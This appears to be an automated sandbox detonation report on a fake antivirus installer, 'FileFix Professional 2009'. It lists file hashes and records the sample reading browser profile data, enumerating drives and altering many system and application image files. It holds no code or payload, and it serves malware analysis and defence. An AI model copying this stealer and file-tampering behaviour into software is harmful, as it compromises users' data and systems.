SHA256 41f0a1b15dd35c2d25442b17bf16602cdaddbea176765b01e8633b20c7edd544
SHA512 443e0543e35b120062cd2cee9d9a96caa042c3c90870a537ae10ae39c6527d78d32824b5b5a1e84db394ce3d7e16d3880a705e74b461f108af5315413ea89970

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 5efd3ae592c00b1af85f29d01ea68ede
SHA1 6026df67033828a93f8aca97185740ec268c39c5
SHA256 ab0a0626af2d84239698869118d3302d8184c421094c1ebbf38fa9475ee9bb47
SHA512 7a39a47da47627478a0365d8751d824e990b470cceed7c2e46f44de70751191e85744e38331673fd3c0c3bf86f68b958b252c84ba0099c6079d66fb88f34287c

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 178c69ff569642a29d7e3e0d769ed1b6
SHA1 a132d6d0aa2d8b571ca6ae4d6edcc28ea13a8fa7
SHA256 f5e4ffe7bb46407aaee8789b6428dbbf0311957f63a23500b21bc6217f018d68
SHA512 6fc609ce963cf59889aca27ccbb592293b3b2d76cb1b1120e47598c1ff3974ece69fc402eb11a795bb7205faa2091a3518869f0c931b068d60bceb26653a0301

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

MD5 fc9ac26379524208bd455b861448bbeb
SHA1 54430990d0189a6b039e1daae7b374b55c88466a
SHA256 06afcdd746b7d79c8929ae2f1dd7b5ce521bd7becd1fdfe221c9474627239c5f
SHA512 3c78c5bd1ce833307144707b5c10839fd90ce66450c1e1e4dd6b60ac0a701b3db3b3ea2d3eb1c8db2424f2527e003e768cf59b4c720294ada2338c12ba262097

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

MD5 681abe65c2221b4836728a7675abcbc4
SHA1 be6e7dd30b388dd128497623bbf7371868a4623d
SHA256 8869fdd49509413447a06499efdc58e1275fc968fa58a04a1af642673d549a3e
SHA512 56dabd6426ddd43ff8889db2298d25c5d015332338c499cb0e06dc4a31fe305cf59e86405e2a37f06c66a6cac309615c0f9aabd0ccb6f1063a1b2b225670ad65

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

MD5 db09bd2b07eaf44f25aebcf9e35fffc7
SHA1 ee5620e85bcc2709fd42f8b0881da980d04d19b5
SHA256 19210beb9db1cae789065cffbd767bbf5c932b031d15a51bca1e4fd602009020
SHA512 2e790f721bb7d607ab20b7733d8ac2a3bdd992ef8c449a60239fb19d30f3478087d83f31f02c001f9e21e1be6afc9ceafc59f27f9fabbcd533f8e1e43ae444c0

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3ce7c53aeb9eab187048331c272f93f8
SHA1 0117ce4f2fca2c639b9dd8660ced380e1378075d
SHA256 7b2270e1167fc804237a32fad034394a785b1a406fcc13e1643f072a5de28dc7
SHA512 cb8bf524e32387eff7b1a6f4c7c828a3aa0aa7d3eaa006b6cbc0ec1381b23e972d122b490196448ea4c088150bd48fa5187bea70db5c15ebc41a0e36b8582abd

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9ea0503fd3c3bef899992de41094a480
SHA1 3e5b1ac4f18d0cbefd9f1a2a631e6592c6cb248d
SHA256 b128cc5ab1bd55d27d9a6675cd7e61fa59f65e4181946104775a4bb2295c4f21
SHA512 c95b794bffef19b55d475aee50bba3bf41bb7ff5ee2b45b28a0578911cb01bfd8a6a1db9ff35006b823409fcdcd3f94d5b6e8ca454803e04c2803134d4536bc0

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d481bfbddb70443c28cb2a9f0fa61e7e
SHA1 8846dc9a93edceafaf079bf70dcd8cf5f00abb42
SHA256 135ede8e1351c764b4a381687f8203ea86432a1ba072e81297c80675edc4c1cd
SHA512 754ebc8df2dc7ce253678070f7b14da4903ac79c0ba67b58c1603adaeb0ab90e49466a4f1883f9bc3c4b984c9d7d861fdd6a73f0e57ec979abe97e0d16e6de4a

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 11d92e1a68d26a59956082b62c2eafaf
SHA1 04cd9cb01e414161e5bb0d21899c99dc6291d7ac
SHA256 18fa8a791d338e48d2eb17759be9dc042a312909f3a6ac90e43afb931d47a87d
SHA512 3a97943d2143159453faab900c6083cc9c563cb8e251c3a72a0a3091a2ae9429c5a2f547c972e89f7b2595b80e5fbfb028e3d5e73c54e188a9e15a874572d70b

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 477111e39ebd454644e9c32e5b1f6f83
SHA1 3cc96bc51579e43cbaeeed1c3d1b10522ab64e62
SHA256 1ccfe9d47acaf0038f8dc13d214d23dccbbe48e0b8c5461c903443fb1e644402
SHA512 88f188f54704d021f02db1056876c04c9ceed337f8b595ad87700c971d4b124ae0c70d773a7ad84e8dad3968952e44cbe58c8e7387c4ad5a808fd7a85d3cccac

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 e9117b246600d04457dc58825bdc8b8c
SHA1 70ca6ff576281391cf7a0e86d2a6a0ef9205d919
SHA256 b2a94ad1cd5e92532171096eeeeda1a01a2408ebf0d636cba969338a8ee67edf
SHA512 ba29bb9c0b691e0d09208426a1cb17a74e8c9dca9cfd9dca1bed15fb3dd1cf476a28efee0237db1d23ef4ddbf0e30c74597524c003a568e509ba2c2eee0ad507

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 a359c2feb92e48101aecfbc2acd9d9f1
SHA1 cc138b30159b47d5e5c05ac35c9834ffb9472cbd
SHA256 ba5d5e0bfb584469b6a710ad8a6dbff91f88aa53f4a74049cfad16f3e1d365d8
SHA512 d36ab594e1ff1967b7b6b7d750b2225eec8633c4debe07d085cbc232ecca0fd57b6e45db297b67415a2db61657178e0d0831fe1edcb533afb636ff4716d40b02

Analysis: behavioral20

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\A: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Z: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\B: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\@VpnToastIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.ppt C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@AppHelpToast.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@AudioToastIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Error.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@EnrollmentToastIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\Bthprops\@BthpropsNotificationLogo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\DefaultAccountTile.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.xls C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Alert.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@WirelessDisplayToast.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-32_altform-unplated_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-100_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-60.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80_altform-unplated_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-72_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SmallTile.scale-100_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalStoreLogo.scale-125_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-36_altform-lightunplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderLogoExtensions.targetsize-336.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosLargeTile.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-64_altform-lightunplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\subscription_intro\auto-renew.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-96_altform-lightunplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-129.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-fullcolor.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-white\SmallTile.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-20_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-20.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\CottonCandy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\firstrun\startup_background.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\MedTile.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-100_contrast-high.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\SmallTile.scale-125.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_TileSmallSquare.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-125.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageMedTile.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_altform-unplated_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxAccountsSplashLogo.scale-140.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-300.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-black_scale-125.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Gravel.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-20_altform-lightunplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Generic-Light.scale-250.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\MedTile.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsMedTile.scale-125.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-150.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-400.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SplashScreen.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-30_altform-fullcolor.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_done.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageSplashScreen.scale-100_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteWideTile.scale-150.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\WideTile.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-100_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubStoreLogo.scale-100_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreBadgeLogo.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-fullcolor.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-32.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSplashLogo.scale-150.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\WideTile.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\nub.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\Assets\ImportFromDevice.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyView-Dark.scale-400.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_altform-unplated_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\Square71x71Logo.contrast-white_scale-125.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\VisualProfiler\images\i_chartzoom_reset.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\Square44x44Logo.targetsize-256.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.scale-100_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.AccountsControl\Images\Outlook.Theme-Dark_Scale-150.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.AccountsControl\Images\Outlook.Theme-Light_Scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\perftools\images\i_save.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Assets\PasswordExpiry.contrast-white_scale-150.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\YourPhoneCallingToast.scale-400_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Theme2\img11.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\WiFiNetworkManagerWarningToast.scale-150_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Theme1\img3.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\network\Images\i_clearCache.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
